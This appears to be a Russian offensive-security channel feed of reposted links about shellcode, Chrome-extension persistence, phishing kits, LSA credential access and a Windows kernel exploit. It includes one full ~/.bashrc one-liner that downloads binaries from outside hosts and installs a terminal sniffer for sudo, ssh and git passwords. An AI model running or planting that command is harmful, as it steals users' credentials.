? [ Print3M @Print3M_ ]

I wrote my first calc.exe "shellcode" in NASM. I find it a little strange that a lot of people write about malware development but almost no one talks about writing your own shellcode. I decided to write something on my own. (good comments, easy readable)

? https://github.com/Print3M/shellcodes/blob/main/calc-exe.asm

? [ tweet ]#для_самых_маленьких

How to fix the Crowdstrike thing:

1. Boot Windows into safe mode
2. Go to C:\Windows\System32\drivers\CrowdStrike
3. Delete C-00000291*.sys
4. Repeat for every host in your enterprise network including remote workers
5. If you're using BitLocker jump off a bridge

*? *Chrome Extension For Persistence

How to silently install any Chrome extension and avoid common indicators of compromise (IOCs). The method avoids using CLI parameters or registry edits, and persists via the Secure Preferences file

? Source:
https://syntax-err0r.github.io/Silently_Install_Chrome_Extension.html

#chrome #persistence #maldev #c2

Участник DreamTeam Acrono сделал предложение своей девушке ?

Давайте поздравим ребят!

From Zero to Hero: Phishing company
#phishing #фишинг #перевод #от_подписчика

Эксклюзивно для канала Похек, @resource_not_found сделал перевод этой статьи на русский язык.

? Спасибо большое ему и надеюсь она будет вам полезна)

? @poxek

? Pentest Award: Ежегодная независимая премия для пентестеров

Команда Awillix объявила о начале приема заявок на ежегодную премию — Pentest Award.

Это отличная возможность выразить свои достижения и продемонстрировать вклад в ИБ сообщество, а также поделиться лучшими практическими историями.

В этот раз будет 6 номинаций, по три призовых места в каждой:

— Пробив WEB;
— Пробив инфраструктуры;
— Девайс;
— Hack the logic;
— Раз bypass, два bypass;
— Ловись рыбка.

Главный приз — тяжеленная стеклянная именная статуэтка, которую, к слову, в прошлом году выиграл мой дорогой snovvcrash за первое место.

И, конечно, не менее главные призы: макбуки, айфоны, смарт-часы, умные колонки, а также другие бесценные подарки от BI.ZONE Bug Bounty и VK Bug Bounty.

#pentestaward

? [ The Hacker's Choice (@[email protected]) @hackerschoice ]

A ~/.bashrc 1-liner to sniff ? sudo/ssh/git passwords (pty MitM). No root required ?

command \-v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \ && { mkdir \-p ~/.config/.pty 2>/dev/null; :; } \ && curl \-o ~/.config/.pty/pty \-fsSL "https://bin.ajam.dev/$(uname \-m)/Baseutils/script" \ && curl \-o ~/.config/.pty/ini \-fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper\-stealth\-linux\-$(uname \-m)" \ && chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \ && echo \-e '\-\-\-\-\-\-\-\-\-\-\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \ && echo \-e '[ \-z "$LC_PTY" ] && [ \-t0 ] && [[ "$HISTFILE" != *null* ]] && [ \-x ~/.config/.pty/ini ] && [ \-x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini \-a "sshd: pts/0" ~/.config/.pty/pty \-qaec "exec \-a \-bash '"$(command \-v bash)"'" \-I ~/.config/.pty/.@pty\-unix.$$\e[0m'

? https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking

? [ tweet ]

прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger

Ой, красота))) Получить данные из LSA без дампа LSASS.

Tool: https://github.com/EvanMcBroom/lsa-whisperer

Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b

#redteam #pentest #creds #dump

GitHub

GitHub - EvanMcBroom/lsa-whisperer: Tools for interacting with authentication packages using their individual message protocols

Tools for interacting with authentication packages using their individual message protocols - EvanMcBroom/lsa-whisperer

CVE-2024-21338

LPE from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.

Blog: https://hakaisecurity.io/cve-2024-21338-from-admin-to-kernel-through-token-manipulation-and-windows-kernel-exploitation/research-blog/

Evilginx ❤️ Gophish
The highly anticipated official integration between Evilginx and Gophish has been unveiled in the latest Evilginx 3.3 update. Alongside this major feature, the update brings numerous quality-of-life enhancements.

? https://breakdev.org/evilginx-3-3-go-phish/

#evilginx #gophish #phishing